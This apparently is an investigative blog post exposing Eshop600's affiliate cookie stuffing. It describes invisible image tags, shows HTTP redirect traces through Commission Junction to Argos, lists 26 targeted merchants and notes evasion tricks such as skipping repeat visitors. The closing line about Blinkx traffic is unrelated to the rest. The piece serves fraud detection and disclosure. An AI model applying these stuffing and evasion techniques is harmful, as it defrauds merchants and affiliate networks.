Note the CSS STYLE of display:none (yellow highlighting) which makes the entire tag invisible. In any event, the 75×100 size (green highlighting) is too small to load a genuine web page. Nonetheless, a trace of the redirect sequence shows that the IMG does indeed redirect through an affiliate network (ValueClick’s Commission Junction) (red) and on to an affiliate merchant (blue).
GET /click-3910892-5590799 HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateHost: www.tkqlhce.comConnection: Keep-AliveHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.tkqlhce.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:02 GMTLocation: http://www.apmebf.com/oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB<Content-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:01 GMT---GET /oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.apmebf.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:07 GMTLocation: http://www.kdukvh.com/rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm<Set-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTSet-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:07 GMT---GET /rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.kdukvh.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.kdukvh.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:18 GMTLocation: http://www.argos.co.uk/webapp/wcs/stores/servlet/ArgosCreateReferral?storeId=10001&referrer=COJUN&cmpid=COJUN&referredURL=&_%24ja=tsid%3A11674%7Cprd%3A3910892Set-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: PBLP=849260:3910892:1327883178648:cjo; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:18 GMT
Of course www.argos.co.uk is just one of dozens of merchants affected. Below are 26 merchants we’ve found targeted by Eshop600, including merchants using affiliate networks Affiliate Window (AW), Commission Junction (CJ), TradeDoubler (TD), and Perfiliate (now owned by Affiliate Window).
direct.asda.com (AW)
www.britishairways.com (AW)
www.dorothyperkins.com (AW)
www.screwfix.com (AW)
groceries.asda.com (Perfiliate)
www.burton.co.uk (AW)
www.evans.co.uk (AW)
www.sky.com (AW)
phone-shop.tesco.com (TD)
www.comet.co.uk (AW)
www.halfords.com (AW)
www.tesco.com (TD)
store.three.co.uk (Perfiliate)
www.currys.co.uk (AW)
www.hsamuel.co.uk (AW)
www.vodafone.co.uk (AW)
www.annsummers.com (AW)
www.debenhams.com (AW)
www.johnlewis.com (AW)
www.wilkinsonplus.com (AW)
www.argos.co.uk (CJ)
www.dixons.co.uk (AW)
www.missselfridge.com (AW)
www.asda.co.uk (Perfiliate)
www.diy.com (AW)
www.pcworld.co.uk (AW)
Beyond encoded JavaScript, Eshop600 also tried other methods to avoid detection. Load an Eshop600 page repeatedly, and it won’t stuff cookies every time; the site is clearly attempting to recognize repeat visitors to avoid restuffing the same users more than once. That makes Eshop600’s practice harder to replicate (an extra challenge for anyone trying to prove an infraction) and helps reduce telltale signs in merchants’ logs.
On one view, these practices are nothing new: Ben has been writing these up since 2004. But affiliate merchants and networks need to remain vigilant to catch these cheaters. We’re finding many dozens of affiliate cookie-stuffers per month, along with other rogue affiliates using spyware/adware, typosquatting, and more. It’s not unusual for cheaters to be among a merchants’ largest affiliates; for example, the 2010 indictment of Shawn Hogan alleges that he was the single largest affiliate in eBay’s affiliate program in 2006-2007, collecting more than $15 million over 18 months. Now, most affiliate programs are far smaller than eBay’s, yielding a correspondingly lower opportunity for fraud. But for mid-sized merchants, there are typically large savings in catching and ejecting all rule-breakers.
Alexa reports a sharp jump in Blinkx traffic in late 2013.
